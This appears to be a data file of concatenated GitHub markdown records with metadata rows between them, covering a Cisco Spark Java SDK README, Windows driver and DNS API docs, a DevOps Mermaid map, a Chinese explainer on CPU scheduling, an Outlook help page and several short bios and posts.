- and political essays (quick way to tag articles)
- and jQuery (though it could be done with any codebase you like, to figure out the common patterns for building transpilation targets).
The counting method takes three arguments:
- (a string) the sample to be deconstructed and counted
- (an int, default 1) the chunk size
- (a boolean, default false) whether to split on spaces or between every character
The method will return an object where the keys are the counted bits and values are the counts.
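As a rough sketch of that contract (the real tool is JavaScript; the function and parameter names below are my own, not enumero's actual API), the counting logic might look like:

```python
def count_tokens(sample, chunk_size=1, split_on_spaces=False):
    # Split the sample into units: words when split_on_spaces is set,
    # individual characters otherwise (mirroring the default described above).
    units = sample.split() if split_on_spaces else list(sample)
    sep = " " if split_on_spaces else ""
    counts = {}
    # Slide a window of `chunk_size` units over the sample and tally each chunk.
    for i in range(len(units) - chunk_size + 1):
        chunk = sep.join(units[i:i + chunk_size])
        counts[chunk] = counts.get(chunk, 0) + 1
    return counts
```

Calling it with a larger `chunk_size` is what surfaces recurring phrases or code patterns rather than single tokens.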
Of course if you just want the whole GUI (which is what I use most), just clone the whole thing and open the index.html file in a browser.
| 50.866667 | 138 | 0.764089 | eng_Latn | 0.999922 |
611be945836cfe9c946143830adedd50698273a3 | 1,043 | md | Markdown | content/bio/stephan-kinsella.md | gy741/lbry.io | cb1d82707e24be2f5b6700fef2b951b07ad00686 | [
"MIT"
] | null | null | null | content/bio/stephan-kinsella.md | gy741/lbry.io | cb1d82707e24be2f5b6700fef2b951b07ad00686 | [
"MIT"
] | null | null | null | content/bio/stephan-kinsella.md | gy741/lbry.io | cb1d82707e24be2f5b6700fef2b951b07ad00686 | [
"MIT"
] | 1 | 2021-03-31T04:01:59.000Z | 2021-03-31T04:01:59.000Z | ---
name: Stephan Kinsella
role: Legal Advisor
---
Stephan Kinsella is a registered patent attorney and has over twenty years’ experience in patent, intellectual property, and general commercial and corporate law. He is the founder and director of the [Center for the Study of Innovative Freedom](http://c4sif.org/). Kinsella has published numerous articles and books on intellectual property law and legal topics including [_International Investment, Political Risk, and Dispute Resolution: A Practitioner’s Guide_](http://www.amazon.com/International-Investment-Political-Dispute-Resolution/dp/0379215225) and [_Against Intellectual Property_](https://mises.org/library/against-intellectual-property-0) .
He received an LL.M. in international business law from [King’s College London](http://www.kcl.ac.uk/), a JD from the Paul M. Hebert Law Center at [Louisiana State University](//lsu.edu), as well as BSEE and MSEE degrees. His websites are [stephankinsella.com](http://stephankinsella.com) and [kinsellalaw.com](http://kinsellalaw.com)
| 130.375 | 655 | 0.794823 | eng_Latn | 0.969168 |
611bfc427057ed70b17f2988a59f3bdae0738a83 | 3,928 | md | Markdown | mermaid-devops-map.md | Sam-Rowe/DevOps-Map | 0373d67da7c8a099608ec62c81f59d3752a7eabd | [
"MIT"
] | 2 | 2020-12-29T14:00:33.000Z | 2021-01-06T17:34:52.000Z | mermaid-devops-map.md | Sam-Rowe/DevOps-Map | 0373d67da7c8a099608ec62c81f59d3752a7eabd | [
"MIT"
] | 4 | 2021-01-03T16:01:35.000Z | 2021-03-13T14:33:31.000Z | mermaid-devops-map.md | Sam-Rowe/DevOps-Map | 0373d67da7c8a099608ec62c81f59d3752a7eabd | [
"MIT"
] | null | null | null | flowchart TB
AgileWork(Agile Work)
AutomatedTesting(Automated Testing)
Blue/GreenDeployment(Blue/Green Deployment)
BranchingStrategy(Branching Strategy)
CanaryReleases(Canary Releases)
ChaosAgent(Chaos Agent)
CodeQualityScans(Code Quality Scans)
CodeQualityScans(Code Quality Scans)
ConfigDatabase/Git(Config Database/Git)
ContainerisedApplication(Containerised Application)
ContinuousDelivery(Continuous Delivery)
ContinuousDeployment(Continuous Deployment)
ContinuousIntegration(Continuous Integration)
CropsnotGardenplants(Crops not Garden plants)
DarkLaunching(Dark Launching)
ExploratoryTesting(Exploratory Testing)
FeatureToggles(Feature Toggles)
ImmutableArtefacts(Immutable Artefacts)
InfrastructureasCode(Infrastructure as Code)
MicroserviceEcosystem(Microservice Ecosystem)
ParametrisedInfrastructureasCode(Parametrised Infrastructure as Code)
ReleaseViews(Release Views)
RepositoryComposition(Repository Composition)
SecretsVault(Secrets Vault)
SemanticVersioning(Semantic Versioning)
SeparationofinternalversioningfromMarketingversioning(Separation of internal versioning from Marketing versioning)
TestDrivenDevelopment(Test Driven Development)
UnitTesting(Unit Testing)
AutomatedTesting <-. Better Together With .-> ExploratoryTesting
AutomatedTesting <-. Better Together With .-> CodeQualityScans
AutomatedTesting .-> | Reduces Failure Of | ContinuousIntegration
UnitTesting --> | Enables | ContinuousIntegration
CodeQualityScans <-. Better Together With .-> AgileWork
AgileWork .-> | Reduces Failure Of | TestDrivenDevelopment
AgileWork --> | Enables | BranchingStrategy
BranchingStrategy --> | Enables | RepositoryComposition
BranchingStrategy --> | Enables | ParametrisedInfrastructureasCode
BranchingStrategy .-> | Reduces Failure Of | ContinuousIntegration
BranchingStrategy .-> | Reduces Failure Of | InfrastructureasCode
InfrastructureasCode --> | Enables | ContinuousDelivery
InfrastructureasCode --> | Enables | ParametrisedInfrastructureasCode
InfrastructureasCode .-> | Reduces Failure Of | ContinuousDelivery
InfrastructureasCode .-> | Reduces Failure Of | ParametrisedInfrastructureasCode
DarkLaunching .-> | Reduces Failure Of | ContinuousDeployment
TestDrivenDevelopment .-> | Reduces Failure Of | UnitTesting
TestDrivenDevelopment .-> | Reduces Failure Of | AutomatedTesting
ContinuousIntegration --> | Enables | ContinuousDelivery
ContinuousIntegration --> | Enables | ImmutableArtefacts
SemanticVersioning --> | Enables | ReleaseViews
SemanticVersioning .-> | Reduces Failure Of | ImmutableArtefacts
ReleaseViews .-> | Reduces Failure Of | SemanticVersioning
ReleaseViews --> | Enables | SeparationofinternalversioningfromMarketingversioning
ImmutableArtefacts .-> | Reduces Failure Of | ContinuousIntegration
ImmutableArtefacts --> | Enables | SemanticVersioning
ContainerisedApplication .-> | Reduces Failure Of | ContinuousDeployment
ContinuousDelivery --> | Enables | ContinuousDeployment
ContinuousDelivery --> | Enables | ContainerisedApplication
SecretsVault <-. Better Together With .-> ContinuousDelivery
SecretsVault <-. Better Together With .-> ContinuousDeployment
ContinuousDeployment --> | Enables | DarkLaunching
ContinuousDeployment --> | Enables | CropsnotGardenplants
ContinuousDeployment --> | Enables | CanaryReleases
ContinuousDeployment --> | Enables | Blue/GreenDeployment
ContinuousDeployment --> | Enables | MicroserviceEcosystem
FeatureToggles .-> | Reduces Failure Of | MicroserviceEcosystem
FeatureToggles <-. Better Together With .-> ConfigDatabase/Git
ChaosAgent .-> | Reduces Failure Of | ContinuousDeployment
CropsnotGardenplants .-> | Reduces Failure Of | ContinuousDeployment
| 55.323944 | 118 | 0.770367 | yue_Hant | 0.310287 |
611c22d44e8a2741405c38bcd07771e40c0ab251 | 1,675 | md | Markdown | AlchemyInsights/outlook-com-missing-folders.md | isabella232/OfficeDocs-AlchemyInsights-pr.fr-FR | b23fe97cbba1674ad1f59978ca5080bb00d217cb | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-05-19T19:06:33.000Z | 2020-05-19T19:06:33.000Z | AlchemyInsights/outlook-com-missing-folders.md | isabella232/OfficeDocs-AlchemyInsights-pr.fr-FR | b23fe97cbba1674ad1f59978ca5080bb00d217cb | [
"CC-BY-4.0",
"MIT"
] | 2 | 2022-02-09T06:56:37.000Z | 2022-02-09T06:56:51.000Z | AlchemyInsights/outlook-com-missing-folders.md | isabella232/OfficeDocs-AlchemyInsights-pr.fr-FR | b23fe97cbba1674ad1f59978ca5080bb00d217cb | [
"CC-BY-4.0",
"MIT"
] | 2 | 2019-10-11T18:36:10.000Z | 2021-10-09T11:34:48.000Z | ---
title: Outlook.com missing folders
ms.author: daeite
author: daeite
manager: joallard
ms.date: 04/21/2020
ms.audience: Admin
ms.topic: article
ms.service: o365-administration
ROBOTS: NOINDEX, NOFOLLOW
localization_priority: Normal
ms.custom:
- "1066"
- "1067"
- "1068"
- "1134"
- "8000061"
ms.assetid: e8e87530-51b6-4386-983c-8c8cca0c5b3f
ms.openlocfilehash: 7ede5d5a7dede4356e20af57740440ce8773d27ddc97de699466ad05c1c7a4bb
ms.sourcegitcommit: b5f7da89a650d2915dc652449623c78be6247175
ms.translationtype: MT
ms.contentlocale: fr-FR
ms.lasthandoff: 08/05/2021
ms.locfileid: "53984063"
---
# <a name="find-missing-folders"></a>Find missing folders
Some users may not be able to see the left folder pane when viewing on a small screen.
- If you can't see the folder pane, maximize your browser window or scroll left to display the folder list.
- Expand the folder pane only when you need it. Select the three-line icon in the left bar to show or hide the folders.
- Open [the layout settings](https://outlook.live.com/mail/options/mail/layout) and select **Hide reading pane**, then **Save**. This gives the screen more room to display the folders.
If you accidentally delete a folder, you can recover it if it is still in your Deleted Items folder. To learn more, see [Restore deleted email messages in Outlook.com](https://support.office.com/article/cf06ab1b-ae0b-418c-a4d9-4e895f83ed50).
| 47.857143 | 315 | 0.804179 | fra_Latn | 0.915701 |
611dced9253ad9862ffbc3019bd76cc0535e6669 | 871 | md | Markdown | content/post/flowingdata-com-2020-07-09-hidden-trackers-on-your-phone.md | chuxinyuan/daily | dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c | [
"MIT"
] | 8 | 2018-03-27T05:17:56.000Z | 2021-09-11T19:18:07.000Z | content/post/flowingdata-com-2020-07-09-hidden-trackers-on-your-phone.md | chuxinyuan/daily | dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c | [
"MIT"
] | 16 | 2018-01-31T04:27:06.000Z | 2021-10-03T19:54:50.000Z | content/post/flowingdata-com-2020-07-09-hidden-trackers-on-your-phone.md | chuxinyuan/daily | dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c | [
"MIT"
] | 12 | 2018-01-27T15:17:26.000Z | 2021-09-07T04:43:12.000Z | ---
title: Hidden trackers on your phone
date: '2020-07-09'
linkTitle: https://flowingdata.com/2020/07/09/hidden-trackers-on-your-phone/
source: FlowingData
description: |-
Sara Morrison for Recode:
Then there’s Cuebiq, which collected location data through its…<p><strong>Tags:</strong> <a href="https://flowingdata.com/tag/mobile/" rel="tag">mobile</a>, <a href="https://flowingdata.com/tag/privacy/" rel="tag">privacy</a>, <a href="https://flowingdata.com/tag/recode/" rel="tag">recode</a></p> ...
disable_comments: true
---
Sara Morrison for Recode:
Then there’s Cuebiq, which collected location data through its…<p><strong>Tags:</strong> <a href="https://flowingdata.com/tag/mobile/" rel="tag">mobile</a>, <a href="https://flowingdata.com/tag/privacy/" rel="tag">privacy</a>, <a href="https://flowingdata.com/tag/recode/" rel="tag">recode</a></p> ... | 72.583333 | 309 | 0.712974 | eng_Latn | 0.300944 |
611e61774860fb7bd3cf1537fc6264b251ca02eb | 4,875 | md | Markdown | README.md | adamweeks/webex-java-sdk | 89720bcd249b44ad45ffd70e393c4ecdd5418d2f | [
"MIT"
] | null | null | null | README.md | adamweeks/webex-java-sdk | 89720bcd249b44ad45ffd70e393c4ecdd5418d2f | [
"MIT"
] | null | null | null | README.md | adamweeks/webex-java-sdk | 89720bcd249b44ad45ffd70e393c4ecdd5418d2f | [
"MIT"
] | null | null | null | <h1 align="center">
<a href="developer.webex.com"><img src="https://www.webex.com/content/dam/wbx/us/images/offer/plans_2-2.png"/></a>
<br/>
<a href="developer.webex.com">spark-java-sdk</a>
</h1>
[](https://github.com/ciscospark/spark-java-sdk/blob/master/LICENSE)
## Introduction
This Java SDK is a Java library for consuming Cisco Webex Teams' RESTful APIs. Please visit us at https://developer.webex.com/ for more information about Cisco Webex for Developers.
_Why spark-java-sdk?_: A rebranding that renamed Cisco Spark to Cisco Webex Teams took place in 2018, some time after this SDK was created.
## Prerequisites
- Java 1.6
- [Apache Maven](https://maven.apache.org/)
Clone the repository
```bash
git clone git@github.com:webex/spark-java-sdk.git
```
Run Maven through the CLI or your favourite IDE
```bash
mvn install
```
## Usage
To start, call the _Spark_ builder with your developer token (can be retrieved from https://developer.webex.com).
```java
String accessToken = "<<secret>>";
Spark spark = Spark.builder()
.baseUrl(URI.create("https://api.ciscospark.com/v1"))
.accessToken(accessToken)
.build();
```
Work with Webex Teams rooms
```java
// List my rooms
spark.rooms()
.iterate()
.forEachRemaining(room -> {
System.out.println(room.getTitle() + ", created " + room.getCreated() + ": " + room.getId());
});
// Create a new room
Room room = new Room();
room.setTitle("Hello World");
room = spark.rooms().post(room);
// Add a coworker to the room
Membership membership = new Membership();
membership.setRoomId(room.getId());
membership.setPersonEmail("wile_e_coyote@acme.com");
spark.memberships().post(membership);
// List the members of the room
spark.memberships()
.queryParam("roomId", room.getId())
.iterate()
.forEachRemaining(member -> {
System.out.println(member.getPersonEmail());
});
// Post a text message to the room
Message message = new Message();
message.setRoomId(room.getId());
message.setText("Hello World!");
spark.messages().post(message);
// Share a file with the room
message = new Message();
message.setRoomId(room.getId());
message.setFiles(URI.create("http://example.com/hello_world.jpg"));
spark.messages().post(message);
// Get person details
Person person = spark.people().path("/<<<**Insert PersonId**>>>").get();
```
Connect to Webex Teams via webhooks
```java
// Create a new webhook
Webhook webhook = new Webhook();
webhook.setName("My Webhook");
webhook.setResource("messages");
webhook.setEvent("created");
webhook.setFilter("mentionedPeople=me");
webhook.setSecret("SOMESECRET");
webhook.setTargetUrl(URI.create("http://www.example.com/webhook"));
webhook=spark.webhooks().post(webhook);
// List webhooks
spark.webhooks().iterate().forEachRemaining(hook -> {
System.out.println(hook.getId() + ": " + hook.getName() + " (" + hook.getTargetUrl() + ")" + " Secret - " + hook.getSecret());
});
// Delete a webhook
webhook=spark.webhooks().path("/<<<**Insert WebhookId**>>>").delete();
```
Find all your relevant information through our APIs
```java
// List people in the organization
spark.people().iterate().forEachRemaining(ppl -> {
System.out.println(ppl.getId() + ": " + ppl.getDisplayName()+" : Creation: "+ppl.getCreated());
});
// Get organizations
spark.organizations().iterate().forEachRemaining(org -> {
System.out.println(org.getId() + ": " + org.getDisplayName()+" : Creation: "+org.getCreated());
});
// Get licenses
spark.licenses().iterate().forEachRemaining(license -> {
    System.out.println("GET Licenses " + license.getId() + ": DisplayName:- " + license.getDisplayName()
        + " : totalUnits: " + license.getTotalUnits() + " : consumedUnits: " + license.getConsumedUnits());
});
// Get roles
spark.roles().iterate().forEachRemaining(role -> {
    System.out.println("GET Roles " + role.getId() + ": Name:- " + role.getName());
});
```
Work directly with your teams
```java
// Create a new team
Team team = new Team();
team.setName("Brand New Team");
team = spark.teams().post(team);
// Add a coworker to the team
TeamMembership teamMembership = new TeamMembership();
teamMembership.setTeamId(team.getId());
teamMembership.setPersonEmail("wile_e_coyote@acme.com");
spark.teamMemberships().post(teamMembership);
// List the members of the team
spark.teamMemberships()
.queryParam("teamId", team.getId())
.iterate()
.forEachRemaining(member -> {
System.out.println(member.getPersonEmail());
});
```
## Contributing
## Maintainers
- Brian (bbender)
- Santosh (santokum)
## License
© 2018 Cisco Systems, Inc. and/or its affiliates. All Rights Reserved. See [LICENSE](LICENSE) for details.
---
UID: NF:ntddk.IoIncrementKeepAliveCount
title: IoIncrementKeepAliveCount function (ntddk.h)
description: The IoIncrementKeepAliveCount routine increments a reference count associated with an Windows app process on a specific device.
old-location: kernel\ioincrementkeepalivecount.htm
tech.root: kernel
ms.date: 04/30/2018
keywords: ["IoIncrementKeepAliveCount function"]
ms.keywords: IoIncrementKeepAliveCount, IoIncrementKeepAliveCount routine [Kernel-Mode Driver Architecture], kernel.ioincrementkeepalivecount, ntddk/IoIncrementKeepAliveCount
req.header: ntddk.h
req.include-header: Ntddk.h
req.target-type: Universal
req.target-min-winverclnt: Available in Windows 8.
req.target-min-winversvr:
req.kmdf-ver:
req.umdf-ver:
req.ddi-compliance:
req.unicode-ansi:
req.idl:
req.max-support:
req.namespace:
req.assembly:
req.type-library:
req.lib: Ntoskrnl.lib
req.dll: Ntoskrnl.exe
req.irql:
targetos: Windows
req.typenames:
f1_keywords:
- IoIncrementKeepAliveCount
- ntddk/IoIncrementKeepAliveCount
topic_type:
- APIRef
- kbSyntax
api_type:
- DllExport
api_location:
- Ntoskrnl.exe
api_name:
- IoIncrementKeepAliveCount
---
# IoIncrementKeepAliveCount function
## -description
The <b>IoIncrementKeepAliveCount</b> routine increments a reference count associated with a Windows app process on a specific device. This routine is called by a kernel-mode driver in response to the app opening a process for I/O. This prevents Windows from suspending the app before the I/O process is complete.
## -parameters
### -param FileObject
[in, out]
The file object handle to the device.
### -param Process
[in, out]
The process associated with the device.
## -returns
This routine returns <b>STATUS_SUCCESS</b> on success, or the appropriate <b>NTSTATUS</b> error code on failure. <b>NTSTATUS</b> error codes are defined in Ntstatus.h.
## -see-also
<a href="/windows-hardware/drivers/ddi/ntddk/nf-ntddk-iodecrementkeepalivecount">IoDecrementKeepAliveCount</a>
```shell
> sudo anka registry add --help
Usage: anka registry add [OPTIONS] REG_NAME REG_URL
  Add repository
Options:
  --help  Show this message and exit.
```
---
UID: NS:windns.__unnamed_struct_30
title: DNS_SRV_DATAW (windns.h)
description: The DNS_SRV_DATA structure represents a DNS service (SRV) record as specified in RFC 2782.
helpviewer_keywords: ["*PDNS_SRV_DATA","*PDNS_SRV_DATAW","DNS_SRV_DATA","DNS_SRV_DATA structure [DNS]","DNS_SRV_DATAW","PDNS_SRV_DATA","PDNS_SRV_DATA structure pointer [DNS]","_dns_dns_srv_data","dns.dns_srv_data","windns/DNS_SRV_DATA","windns/PDNS_SRV_DATA"]
old-location: dns\dns_srv_data.htm
tech.root: DNS
ms.assetid: 212db7ac-a5e3-4e58-b1c2-0eb551403dfc
ms.date: 12/05/2018
ms.keywords: '*PDNS_SRV_DATA, *PDNS_SRV_DATAW, DNS_SRV_DATA, DNS_SRV_DATA structure [DNS], DNS_SRV_DATAW, PDNS_SRV_DATA, PDNS_SRV_DATA structure pointer [DNS], _dns_dns_srv_data, dns.dns_srv_data, windns/DNS_SRV_DATA, windns/PDNS_SRV_DATA'
req.header: windns.h
req.include-header:
req.target-type: Windows
req.target-min-winverclnt: Windows 2000 Professional [desktop apps only]
req.target-min-winversvr: Windows 2000 Server [desktop apps only]
req.kmdf-ver:
req.umdf-ver:
req.ddi-compliance:
req.unicode-ansi:
req.idl:
req.max-support:
req.namespace:
req.assembly:
req.type-library:
req.lib:
req.dll:
req.irql:
targetos: Windows
req.typenames: DNS_SRV_DATAW, *PDNS_SRV_DATAW
req.redist:
ms.custom: 19H1
f1_keywords:
- PDNS_SRV_DATAW
- windns/PDNS_SRV_DATAW
- DNS_SRV_DATAW
- windns/DNS_SRV_DATAW
dev_langs:
- c++
topic_type:
- APIRef
- kbSyntax
api_type:
- HeaderDef
api_location:
- Windns.h
api_name:
- DNS_SRV_DATA
---
# DNS_SRV_DATAW structure
## -description
The
<b>DNS_SRV_DATA</b> structure represents a DNS service (SRV) record as specified in <a href="https://www.ietf.org/rfc/rfc2782.txt">RFC 2782</a>.
## -struct-fields
### -field pNameTarget
A pointer to a string that represents the target host.
### -field wPriority
The priority of the target host specified in <b>pNameTarget</b>. Lower numbers imply higher priority to clients attempting to use this service.
### -field wWeight
The relative weight of the target host in <b>pNameTarget</b> to other hosts with the same <b>wPriority</b>. The chances of using this host should be proportional to its weight.
### -field wPort
The port used on the target host for this service.
### -field Pad
Reserved for padding. Do not use.
## -remarks
The
<b>DNS_SRV_DATA</b> structure is used in conjunction with the
<a href="/windows/win32/api/windns/ns-windns-dns_recorda">DNS_RECORD</a> structure to programmatically manage DNS entries.
> [!NOTE]
> The windns.h header defines DNS_SRV_DATA as an alias which automatically selects the ANSI or Unicode version of this function based on the definition of the UNICODE preprocessor constant. Mixing usage of the encoding-neutral alias with code that is not encoding-neutral can lead to mismatches that result in compilation or runtime errors. For more information, see [Conventions for Function Prototypes](/windows/win32/intl/conventions-for-function-prototypes).
## -see-also
<a href="/windows/win32/api/windns/ns-windns-dns_recorda">DNS_RECORD</a>
# zlib-1.2.5Src
Source code to generate the compiled lib with C++ Builder 2010, Win32 version.
# Detroit-Restaurant-Inspections-n-Violations
Restaurant Inspections and Violations in the city of Detroit.
---
layout: post
title: Processor Scheduling Concepts
categories: Operating Systems
description: Processor scheduling concepts
keywords: C, scheduling
---
The CPU is one of the most important resources in a computer system. In early computer systems, managing it was very simple: like every other system resource, it was monopolized by a single job, so there was no processor allocation or scheduling problem. With the advent of multiprogramming techniques and the many different types of operating systems, a variety of CPU management methods came into use.
Different CPU management methods give different users operating systems with different performance characteristics.
In a multiprogrammed batch system, to improve processor efficiency and increase job throughput, a batch of jobs scheduled to run concurrently should be combined as sensibly as possible so that all of the system's resources are fully utilized.
In a time-sharing system, because users work through interactive sessions, the system must respond quickly enough that each user feels as if he or she alone were using the machine.
In a real-time system, the processor's response time is the first consideration.
Clearly, different operating-system requirements call for different processor management policies.
#### Basic Concepts of Scheduling
In a multiprogramming system, the number of processes is usually larger than the number of processors, so competition among processes for a processor is unavoidable. **Processor scheduling is the allocation of processors: following some (fair and efficient) algorithm, it selects a process from the ready queue and assigns a processor to it so that processes can execute concurrently.** Processor scheduling is the foundation of a multiprogramming operating system and a core problem in operating-system design.
#### Scheduling Levels
From submission to completion, a job typically passes through the following four levels of scheduling:
1) Job scheduling, also called high-level scheduling. **Its main task is to select, according to some policy, one or more jobs in the backup state on external storage, allocate to them the memory, input/output devices, and other necessary resources, and create the corresponding processes so that they gain the right to compete for the processor.** In short, it is scheduling between memory and auxiliary storage. Each job is brought in only once and moved out only once.
Most multiprogrammed batch systems are equipped with job scheduling, while other systems usually do not need it. Job scheduling runs at a low frequency, typically once every few minutes.
2) Intermediate scheduling, also called memory scheduling. Intermediate scheduling is introduced **to improve memory utilization and system throughput**. To that end, processes that temporarily cannot run are moved out to external storage to wait; a process in this situation is said to be in the suspended state. When such processes become runnable again and memory has some room to spare, intermediate scheduling decides which of the ready processes on external storage to bring back into memory, changes their state to ready, and places them on the ready queue to wait.
3) Process scheduling, also called low-level scheduling. **Its main task is to select a process from the ready queue by some method and policy and assign the processor to it.** Process scheduling is the most basic kind of scheduling in an operating system and must be present in virtually every operating system. It runs at a very high frequency, typically once every few tens of milliseconds.
4) Thread scheduling.
**Multiprogrammed batch systems have both job scheduling and process scheduling**; however, **time-sharing and real-time systems generally have no job scheduling — only process scheduling, intermediate scheduling, and thread scheduling**. This is because in time-sharing and real-time systems, to shorten response times or to meet users' deadlines, jobs are created directly in memory rather than on external storage. In such systems, as soon as interaction between the user and the system begins, the user takes control immediately, so there is no job-submission state or backup state: input arrives through the terminal buffer and is either processed immediately or temporarily stored on external storage by the swapping scheduler.
![Scheduling levels](/images/posts/linuxc/diaodu.png)
#### How the Three Levels of Scheduling Relate
Job scheduling selects a batch of jobs from the backup queue on external storage to bring into memory and creates processes for them; these processes enter the ready queue. Process scheduling selects one process from the ready queue, changes its state to running, and assigns the CPU to it. Intermediate scheduling exists to improve memory utilization: the system suspends processes that temporarily cannot run, and when memory becomes roomy again, intermediate scheduling picks a process that is ready to run and wakes it up.
1) Job scheduling prepares a process for activity; process scheduling sets the process in motion; intermediate scheduling suspends processes that temporarily cannot run and sits between job scheduling and process scheduling.
2) Job scheduling occurs least often, intermediate scheduling somewhat more often, and process scheduling most frequently of all.
3) Process scheduling is the most fundamental of the three and cannot be omitted.
#### The Relationship Between Jobs and Processes
A job can be seen as the **task entity** through which a user submits work to the computer — for example, a computation or a control procedure. A process, in turn, is the **execution entity** the computer sets up to complete the user's **task entity**, and it is the basic unit of resource allocation. Clearly, to complete one task entity the computer needs at least one execution entity; in other words, **a job always consists of one or more processes**.
To decompose a job into processes, the system must first create a root process for the job. Then, as the job control statements are executed, the system or the root process creates child processes as the tasks require, allocates resources to those child processes, and schedules them for execution to complete the tasks the job demands.
#### Job Scheduling
Job scheduling mainly handles a job's transition from the backup state to the execution state, and from the execution state to the completed state.
The functions of job scheduling are:
(1) Record the status of every job in the system, including information about its execution phase.
(2) Select some jobs from the backup queue and put them into execution. There are usually many jobs in the backup state — on a large system, dozens or even hundreds, depending on the size of the input well — while only a limited number of jobs are executing at any one time. **The job scheduler uses a chosen scheduling algorithm to pick several jobs from the backup queue and put them into execution.**
(3) Prepare the selected jobs for execution. **The job scheduler creates the corresponding processes for the selected jobs and allocates the system resources those processes need**, such as memory, external storage, and peripherals.
(4) Perform cleanup when a job finishes. This mainly means outputting job-management information, such as execution time, and then reclaiming the resources the job occupied and destroying all processes associated with the job along with its job control block.
#### Process Scheduling
Whether in a batch, time-sharing, or real-time system, **the number of user processes generally exceeds the number of processors, which inevitably leads user processes to compete for processors**. System processes need processor time as well. The process scheduler must therefore follow some policy to dynamically assign a processor to one of the processes in the ready queue so that it can execute.
The specific functions of process scheduling are:
1. Record the execution status of every process in the system.
2. Select the process that will occupy the processor. The main function of process scheduling is to select, according to some policy, a process in the ready state and let it acquire a processor for execution.
3. Perform process context switches. When the running process must give up the processor for some reason, the system performs a context switch so that the newly selected process can execute. The selected process must resume from wherever it was last interrupted, which requires restoring that process's context — that is, performing a context switch. The system keeps enough information about the switched-out process that, when it is switched back in later, its execution can be resumed smoothly. After the system saves the CPU state, the scheduler selects a new process in the ready state, assembles that process's context, and transfers control of the CPU to the selected process.
#### Timing, Switching, and the Scheduling Process
The process-scheduling and switching code is part of the operating-system kernel. Only after an event that requests scheduling occurs can the process scheduler run, and only after a new ready process has been chosen does the switch between processes take place. In theory these three things happen in sequence, but in practice, if something that would trigger process scheduling happens while kernel code is running, the scheduling and switching cannot always be performed immediately.
In modern operating systems, process scheduling and switching cannot be performed in the following situations:
1) While an interrupt is being handled: interrupt handling is complex, and switching processes in the middle of it is hard to implement; moreover, interrupt handling is part of the system's own work, logically belongs to no particular process, and should not have the processor taken away from it.
2) While a process is inside a critical section of operating-system kernel code: after entering the critical section, the process needs exclusive access to shared data and in principle must hold a lock to keep other concurrent code out; before the lock is released, the system should not switch to another process, so that the shared data is released sooner.
3) During other atomic operations that require interrupts to be fully masked, such as locking, unlocking, saving the interrupt context, and restoring it. In an atomic operation even interrupts are masked, so process scheduling and switching are out of the question.
If a condition that triggers scheduling arises during any of the above, scheduling and switching cannot happen immediately; instead, the system sets its request-scheduling flag, and the scheduling and switching take place only after the activity finishes.
Situations in which process scheduling and switching should be performed:
1) When a condition that triggers scheduling occurs and the current process cannot continue to run, scheduling and switching can happen immediately. If the operating system performs process scheduling only in this situation, the scheduling is non-preemptive.
2) When interrupt handling or trap handling finishes and the request-scheduling flag is set before returning to the interrupted process's user-mode execution site, scheduling and switching can happen right away. An operating system that runs the scheduler in this situation implements preemptive scheduling.
A process switch usually occurs immediately after scheduling completes. It requires saving the context of the original process at the switch point and restoring the context of the scheduled process. During a context switch, the operating-system kernel saves the original process's context by pushing it onto the current process's kernel stack and updating the stack pointer. After the kernel loads the new process's context from its kernel stack, updates the pointer to the currently running process's address space, resets the PC register, and completes the related work, the new process begins to run.
#### Process Scheduling Modes
The process scheduling mode answers the following question: when a process is executing on a processor and a more important or urgent process needs attention — that is, a process with higher priority enters the ready queue — how should the processor be allocated?
There are two common process scheduling modes:
1) Non-preemptive scheduling. When a process is running on a processor, even if a more important or urgent process enters the ready queue, the running process is allowed to continue until it completes or enters the blocked state because of some event; only then is the processor given to the more important or urgent process.
With non-preemptive scheduling, **once the CPU is allocated to a process, that process keeps the CPU until it terminates or transitions to the waiting state**. This approach is simple to implement and has low system overhead, which suits most batch systems, but it cannot be used for time-sharing systems or most real-time systems.
2) Preemptive scheduling. When a process is running on a processor and a more important or urgent process needs the processor, the running process is immediately suspended and the processor is assigned to the more important or urgent process.
**Preemptive scheduling brings clear benefits to system throughput and responsiveness.** But preemption is not an arbitrary act; it must follow certain principles, chiefly priority, shortest-process-first, and time-slice rules.
#### Basic Scheduling Criteria
Different scheduling algorithms have different characteristics, and those characteristics must be considered when choosing one. To compare the performance of processor scheduling algorithms, many evaluation criteria have been proposed; the main ones are:
1) CPU utilization. The CPU is one of the most important and expensive resources in a computer system, so it should be kept as busy as possible to maximize the utilization of this resource.
2) System throughput: the number of jobs the CPU completes per unit of time. Long jobs consume a lot of processor time and therefore lower system throughput, while short jobs need comparatively little processor time and raise it. The choice of scheduling algorithm and mode also has a considerable effect on system throughput.
3) Turnaround time: the time from job submission to job completion, that is, the sum of the time the job spends waiting, queuing in the ready queue, running on the processor, and performing input/output operations.
A job's turnaround time can be expressed by the formula:
**turnaround time = job completion time - job submission time**
The average turnaround time is the mean of several jobs' turnaround times:
**average turnaround time = (turnaround time of job 1 + ... + turnaround time of job n) / n**
The weighted turnaround time is the ratio of a job's turnaround time to its actual running time:
**weighted turnaround time = turnaround time / actual running time**
The average weighted turnaround time is the mean of several jobs' weighted turnaround times:
**average weighted turnaround time = (weighted turnaround time of job 1 + ... + weighted turnaround time of job n) / n**
4) Waiting time: the total time a process spends waiting for a processor. The longer the waiting time, the lower user satisfaction. A processor scheduling algorithm does not actually affect the time a job spends executing or performing input/output; it affects only the time the job waits in the ready queue. So the waiting time alone is often enough to judge how good a scheduling algorithm is.
5) Response time: the time from when a user submits a request until the system first produces a response. In an interactive system, turnaround time cannot be the best evaluation criterion; response time is generally adopted as one of the important measures of a scheduling algorithm. From the user's point of view, the scheduling policy should keep response time as low as possible, within a range the user can accept.
It is practically impossible to find an algorithm that satisfies all users and all system requirements. A scheduler design must, on the one hand, satisfy the needs of the system's particular users (such as fast response for certain real-time and interactive processes) and, on the other hand, consider overall system efficiency (such as reducing the average turnaround time of all processes) — while also keeping the overhead of the scheduling algorithm itself in mind.
---
title: 6dec1916074ee664e88ddf980e761991
mitle: "Tips to Help You Learn How to Fold Origami Models"
image: "https://fthmb.tqn.com/MTpBeVmUDM6Mvf2LLPgCDXV5Y7w=/3491x2431/filters:fill(auto,1)/origami-zoo-56a6d6333df78cf772907b5e.jpg"
description: ""
---
If you want to learn origami, you aren't alone. Millions of people around the world have discovered that the art of paper folding can be a highly enjoyable pastime. This article provides a few general tips to help you get started with your origami studies.

